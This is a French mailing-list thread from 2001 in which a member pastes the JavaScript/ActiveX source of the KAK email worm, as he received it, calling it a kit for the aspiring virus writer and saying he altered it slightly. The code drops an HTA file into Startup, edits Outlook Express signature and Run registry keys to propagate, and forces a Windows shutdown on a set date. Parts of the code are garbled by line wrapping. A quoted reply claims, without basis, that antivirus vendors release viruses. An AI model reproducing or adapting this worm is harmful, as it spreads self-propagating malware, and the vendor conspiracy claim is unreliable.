C y b e r C a f e 2 1 @ l i s t s . E x M a c h i n a . n e t !
<http://www.cybercafe21.net> & <http://www.cybercafe21.tv>
Mais oui, biensur tu as teièrement raison ... des titres de mail verolés ...
comme par exemple des demandes d'infos de clients.
Je viens de recevoir à l'instant d'un visiteur sur notre site, un mail
demandant de la documentation .... et devine quoi ? Il est contaminé par le
virus KAK worm
Allez zou amuse toi avec ceci je te fournis la panopelie du petit veroleur
parfait. voici le code du virus inclus dans le mail
(j'ai un peu modifié le code afin qu'il ne fasse plus de conneries ... à toi
de retrouver les erreurs :o)
Pascal aka peniciline Jeck
<DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
<OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC
id=scr></OBJECT></DIV>
<SCRIPT><!--
function sErr(){return
true;}window.onerror=sErr;scr.Reset();scr.doc="Z<HTML><HEAD><TITLE>Driver
Memory Error</"+"TITLE><HTA:APPLICATION ID=\"hO\"
WINDOWSTATE=Minimize></"+"HEAD><BODY BGCOLOR=#CCCCCC><object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCRIPT>fun
ction sEr(){self.close();return true;}window.onerror=sEr;fs=new
ActiveXObject('Scripting.FileSystemObject');wd='C:\\\\Windows\\\\';fl=fs.Get
Folder(wd+'Applic~1\\\\Identities');sbf=fl.SubFolders;for(var mye=new
Enumerator(sbf);!mye.atEnd();idd=mye.item();ids=new
String(idd);idn=ids.slice(31);fic=idn.substring(1,9);kfr=wd+'MENUDÉ~1\\\\PRO
GRA~1\\\\DÉMARR~1\\\\kak.hta';ken=wd+'STARTM~1\\\\Programs\\\\StartUp\\\\kak
.hta';k2=wd+'System\\\\'+fic+'.hta';kk=(fs.FileExists(kfr))?kfr:ken;aek='C:\
\\\AE.KAK';aeb='C:\\\\Autoexec.bat';if(!fs.FileExists(aek)){re=/kak.hta/i;if
(hO.commandLine.search(kk,k2);fs.GetFile(k2).Attributes=2;}t2=fs.CreateTextF
ile(wd+'kak.reg');t2.write('REGEDIT4');t2.WriteBlankLines(2);ky='[HKEY_CURRE
NT_USER\\\\Identities\\\\'+idn+'\\\\Software\\\\Microsoft\\\\Outlook
Express\\\\5.0';sg='\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\"Defa
ult
Signature\"=\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\\\000
00000]');t2.WriteLine('\"name\"=\"Signature
#1\"');t2.WriteLine('\"type\"=dword:00000002');t2.WriteLineHKEY_LOCAL_MACHIN
E\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Run]');t2.Write('\"cAg0u\"=\"C:\\\\
\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.hta\"');t2.WriteBlankLines(2);t2.cl
ose();wsh.Run(wd+'Regedit.exe -s
'+wd+'kak.reg');t3=fs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML><BODY><
DIV style=\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT
classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC
id=scr></"+"OBJECT></"+"DIV>');t4=fs.OpenTextFile(k2,1);while(t4.Read(1)!='Z
');t3.WriteLine('<SCRIPT><!--');t3.write('function sErr(){return
true;}window.onerror=sErr;scr.Reset();scr.doc=\"Z');rs=t4.Read(3095);t4.clos
e();rd=/\\\\/g;re=/\"/g;rf=/<\\//g;rt=rs.replace(rd,'\\\\\\\\').replace(re,'
\\\\\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=(navigator.systemLa
nguage)?navigator.systemLanguage:navigator.language;scr.Path=(la==\"fr\")?\"
C:\\\\\\\\windows\\\\\\\\Menu
Démarrer\\\\\\\\Programmes\\\\\\\\Démarrage\\\\\\\\kak.hta\":\"C:\\\\\\\\win
dows\\\\\\\\Start
Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=navigator.userAgent
.toLowerCase();if(((agt.indexOf(\"msie\")!=-1)&&(parseInt(navigator.appVersi
on)>4))||(agt.indexOf(\"msie
5.\")!=-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT></"+"
'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs.
DeleteFile(wd+'kak.reg');d=new Date();if(d.getDate()==1 &&
d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today
!');wsh.Run(wd+'RUNDLL32.EXE user.exe,exitwindows');}S3 driver memory alloc
failed
!]]%%%%%</"+"BODY></"+"HTML>";la=(navigator.systemLanguage)?navigator.system
Language:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu
Démarrer\\Programmes\\Démarrage\\kak.hta":"C:\\windows\\Start
Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if((
(agt.indexOf("msie")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf
("msie 5.")!=-1))scr.write();
file://--></SCRIPT>
</OBJECT></DIV></BLOCKQUOTE></BODY></HTML>
----- Original Message -----
From: "Christophe Géradon" <[EMAIL PROTECTED]>
To: "CyberCafe21" <[EMAIL PROTECTED]>
Sent: Monday, March 19, 2001 12:52 AM
Subject: Re: [CC21] Blanche Neige.
C y b e r C a f e 2 1 @ l i s t s . E x M a c h i n a . n e t !
<http://www.cybercafe21.net> & <http://www.cybercafe21.tv>
----- Original Message -----
From: "Capt'n Le Jeck" <[EMAIL PROTECTED]>
> Pas de ton avis .... quand tu reçois un mail en HTML qui contient un vers
en
> active-X ... hein ? Style l'Ethan que j'ai reçu il y a 3 semaines ? D'acc
tu
> n'as qu'à mettre ton mailer en sécurité maximum ... mais bon le temps de
> l'ASCII est passé.
Le sujet des mails Verolés est quand même assez voyant, qui t'obliges à les
ouvrir ?
> Donc, l'antivirus n'est pas un jouet pour les paranos
Ce qui m'a toujours fait rire avec les antivirus, c'est que les société qui
les programment vivent des virus qu'ils combattent. Donc, d'une certaine
façon, ces fâmeux "Combattants pour la sérénité de nos disques durs" doivent
tout de même être bien content que les virus pululent. De là à penser que
ces virus sont introduits par ceux-là même qui font payer l'antidote, il n'y
a qu'un pas. C'est tentant, n'est-ce pas ? Ces experts viraux savent qu'à
chaque virus introduit, ils perçoivent un pactol en commandes de leur jolis
logiciels...
> Pascal aka para-dodo Jeck
Christophe Géradon,
http://bibliocosme.com
http://www.Yezzz.com. Votre salle de vente aux enchres virtuelle.
Et la meilleure adresse pour acheter ou vendre. Cliquez sur la rubrique
de votre choix et lancez votre offre.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
La liste CC21 vous est offert par Ex Machina <http://www.exmachina.net/>
Pour vous desabonner rapido <mailto:[EMAIL PROTECTED]>
http://www.Yezzz.com. Votre salle de vente aux enchres virtuelle.
Et la meilleure adresse pour acheter ou vendre. Cliquez sur la rubrique
de votre choix et lancez votre offre.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
La liste CC21 vous est offert par Ex Machina <http://www.exmachina.net/>
Pour vous desabonner rapido <mailto:[EMAIL PROTECTED]>
